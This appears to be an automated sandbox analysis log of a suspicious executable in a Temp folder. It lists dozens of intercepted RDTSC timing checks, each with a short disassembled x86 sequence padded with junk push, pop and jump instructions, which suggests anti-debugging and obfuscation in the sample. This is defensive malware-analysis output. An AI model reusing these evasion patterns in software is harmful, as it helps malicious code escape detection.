Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5C7915 second address: 5C7923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F12E0FAFC76h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5C7923 second address: 5C792E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F12E108FDB6h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 59818C second address: 5981B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F12E0FAFC76h 0x00000009 jbe 00007F12E0FAFC76h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F12E0FAFC82h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5981B4 second address: 5981C7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F12E108FDB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jo 00007F12E108FDB6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 59C81A second address: 59C81F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 59ED89 second address: 59ED8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5A5D7B second address: 5A5D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5A5D7F second address: 5A5E2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F12E108FDB6h 0x00000009 js 00007F12E108FDB6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F12E108FDB8h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d pushad 0x0000002e mov edx, dword ptr [ebp+122D1E21h] 0x00000034 jmp 00007F12E108FDC3h 0x00000039 popad 0x0000003a push dword ptr fs:[00000000h] 0x00000041 sub dword ptr [ebp+122D31E3h], esi 0x00000047 mov dword ptr fs:[00000000h], esp 0x0000004e mov ebx, dword ptr [ebp+122D1B9Bh] 0x00000054 mov eax, dword ptr [ebp+122D00DDh] 0x0000005a sbb ebx, 01E1A76Fh 0x00000060 push FFFFFFFFh 0x00000062 push 00000000h 0x00000064 push edi 0x00000065 call 00007F12E108FDB8h 0x0000006a pop edi 0x0000006b mov dword ptr [esp+04h], edi 0x0000006f add dword ptr [esp+04h], 00000016h 0x00000077 inc edi 0x00000078 push edi 0x00000079 ret 0x0000007a pop edi 0x0000007b ret 0x0000007c jmp 00007F12E108FDBCh 0x00000081 push eax 0x00000082 push eax 0x00000083 push edx 0x00000084 jl 00007F12E108FDB8h 0x0000008a pushad 0x0000008b popad 0x0000008c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5A9C1F second address: 5A9C24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5A6CC4 second address: 5A6CCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5AF165 second address: 5AF16E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5AF16E second address: 5AF172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5AF172 second address: 5AF193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F12E0FAFC85h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5AF193 second address: 5AF19D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5C7A91 second address: 5C7AAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F12E0FAFC88h 0x0000000c jmp 00007F12E0FAFC82h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5C7AAF second address: 5C7AB4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5C7AB4 second address: 5C7ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5C7C22 second address: 5C7C28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 577483 second address: 5774A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E0FAFC7Ch 0x00000007 jo 00007F12E0FAFC78h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 js 00007F12E0FAFC76h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5774A6 second address: 5774BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F12E108FDBEh 0x0000000e pushad 0x0000000f popad 0x00000010 je 00007F12E108FDB6h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5774BF second address: 5774C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5C81BE second address: 5C81F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F12E108FDBCh 0x0000000b jns 00007F12E108FDB6h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F12E108FDC7h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5C81F0 second address: 5C822A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F12E0FAFC89h 0x0000000b pushad 0x0000000c jmp 00007F12E0FAFC88h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5CBBA2 second address: 5CBBA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5CBBA6 second address: 5CBBAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5CBBAE second address: 5CBBB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5CBBB3 second address: 5CBBC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F12E0FAFC76h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5D2FDB second address: 5D2FF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F12E108FDB6h 0x0000000a jmp 00007F12E108FDBEh 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5D2FF4 second address: 5D2FF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5D2FF9 second address: 5D3001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5D3001 second address: 5D3022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F12E0FAFC84h 0x0000000c jno 00007F12E0FAFC76h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5D2BBA second address: 5D2BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F12E108FDB6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5D2BC4 second address: 5D2BC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5D3ABC second address: 5D3AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5944BB second address: 5944C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5944C1 second address: 5944C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5944C5 second address: 57689A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 js 00007F12E0FAFC7Eh 0x0000000f jp 00007F12E0FAFC78h 0x00000015 nop 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F12E0FAFC78h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 jbe 00007F12E0FAFC7Bh 0x00000036 mov edi, 71398A3Ah 0x0000003b sub dword ptr [ebp+122D2756h], esi 0x00000041 lea eax, dword ptr [ebp+12489249h] 0x00000047 movzx edi, bx 0x0000004a nop 0x0000004b jns 00007F12E0FAFC7Eh 0x00000051 push eax 0x00000052 pushad 0x00000053 jmp 00007F12E0FAFC7Fh 0x00000058 push edi 0x00000059 jc 00007F12E0FAFC76h 0x0000005f pop edi 0x00000060 popad 0x00000061 nop 0x00000062 mov ecx, dword ptr [ebp+122D1C52h] 0x00000068 call dword ptr [ebp+122D1B6Bh] 0x0000006e push ebx 0x0000006f pushad 0x00000070 jns 00007F12E0FAFC76h 0x00000076 pushad 0x00000077 popad 0x00000078 jmp 00007F12E0FAFC7Bh 0x0000007d popad 0x0000007e push ebx 0x0000007f push eax 0x00000080 push edx 0x00000081 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5945CD second address: 5945D7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F12E108FDBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 595291 second address: 595295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 595295 second address: 59529B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 59529B second address: 5952B4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F12E0FAFC78h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 jbe 00007F12E0FAFC76h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 59553A second address: 59558E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F12E108FDB8h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 pushad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b popad 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 jmp 00007F12E108FDC2h 0x00000025 mov eax, dword ptr [eax] 0x00000027 jmp 00007F12E108FDBAh 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F12E108FDBFh 0x00000038 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 59565E second address: 5956B6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F12E0FAFC76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b add edi, 066802FBh 0x00000011 mov dword ptr [ebp+12483F1Ah], edx 0x00000017 lea eax, dword ptr [ebp+1248928Dh] 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007F12E0FAFC78h 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], esi 0x0000002a add dword ptr [esp+04h], 0000001Ch 0x00000032 inc esi 0x00000033 push esi 0x00000034 ret 0x00000035 pop esi 0x00000036 ret 0x00000037 jmp 00007F12E0FAFC80h 0x0000003c nop 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push ebx 0x00000042 pop ebx 0x00000043 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5956B6 second address: 5956C0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F12E108FDB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5956C0 second address: 5956CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F12E0FAFC76h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5956CA second address: 5956DC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F12E108FDB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5956DC second address: 5956E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5956E0 second address: 577483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F12E108FDB8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 lea eax, dword ptr [ebp+12489249h] 0x00000028 push 00000000h 0x0000002a push edi 0x0000002b call 00007F12E108FDB8h 0x00000030 pop edi 0x00000031 mov dword ptr [esp+04h], edi 0x00000035 add dword ptr [esp+04h], 00000015h 0x0000003d inc edi 0x0000003e push edi 0x0000003f ret 0x00000040 pop edi 0x00000041 ret 0x00000042 or dword ptr [ebp+12469D19h], edx 0x00000048 push eax 0x00000049 jnl 00007F12E108FDCDh 0x0000004f mov dword ptr [esp], eax 0x00000052 call dword ptr [ebp+122D215Ch] 0x00000058 push eax 0x00000059 push edx 0x0000005a push ecx 0x0000005b push edx 0x0000005c pop edx 0x0000005d jmp 00007F12E108FDC6h 0x00000062 pop ecx 0x00000063 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5D85A7 second address: 5D85AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5DCF60 second address: 5DCF6A instructions: 0x00000000 rdtsc 0x00000002 js 00007F12E108FDB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5DCF6A second address: 5DCF88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 jmp 00007F12E0FAFC84h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5DCF88 second address: 5DCFA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 jmp 00007F12E108FDC1h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5508CE second address: 5508E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12E0FAFC7Bh 0x00000009 jmp 00007F12E0FAFC7Ch 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5DCB10 second address: 5DCB18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E30CD second address: 5E30DE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jno 00007F12E0FAFC76h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E29BD second address: 5E29CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F12E108FDBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E29CB second address: 5E29E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F12E0FAFC86h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E2DF1 second address: 5E2E0D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F12E108FDC2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E2E0D second address: 5E2E32 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 js 00007F12E0FAFC76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F12E0FAFC89h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E7FB8 second address: 5E7FBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E7FBE second address: 5E7FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E7FC2 second address: 5E7FC8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E7FC8 second address: 5E7FD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E7FD1 second address: 5E8001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F12E108FDBEh 0x0000000e jmp 00007F12E108FDC9h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E73A0 second address: 5E73A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E73A8 second address: 5E73D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12E108FDC0h 0x00000009 jmp 00007F12E108FDC5h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E76DD second address: 5E76E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E76E3 second address: 5E76E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E76E7 second address: 5E76F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F12E0FAFC76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E76F6 second address: 5E775F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12E108FDBDh 0x00000009 jmp 00007F12E108FDC3h 0x0000000e popad 0x0000000f jnp 00007F12E108FDCCh 0x00000015 jmp 00007F12E108FDC7h 0x0000001a popad 0x0000001b jbe 00007F12E108FDCEh 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 pop eax 0x00000025 jno 00007F12E108FDB6h 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5E78B1 second address: 5E7915 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F12E0FAFC7Ch 0x00000008 pushad 0x00000009 jmp 00007F12E0FAFC86h 0x0000000e jnc 00007F12E0FAFC76h 0x00000014 jl 00007F12E0FAFC76h 0x0000001a jnc 00007F12E0FAFC76h 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 jl 00007F12E0FAFCA7h 0x00000029 jmp 00007F12E0FAFC7Ch 0x0000002e pushad 0x0000002f jmp 00007F12E0FAFC85h 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5EC424 second address: 5EC42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5EC582 second address: 5EC58C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F12E0FAFC76h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5EC58C second address: 5EC59A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F12E108FDB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5EC59A second address: 5EC59E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
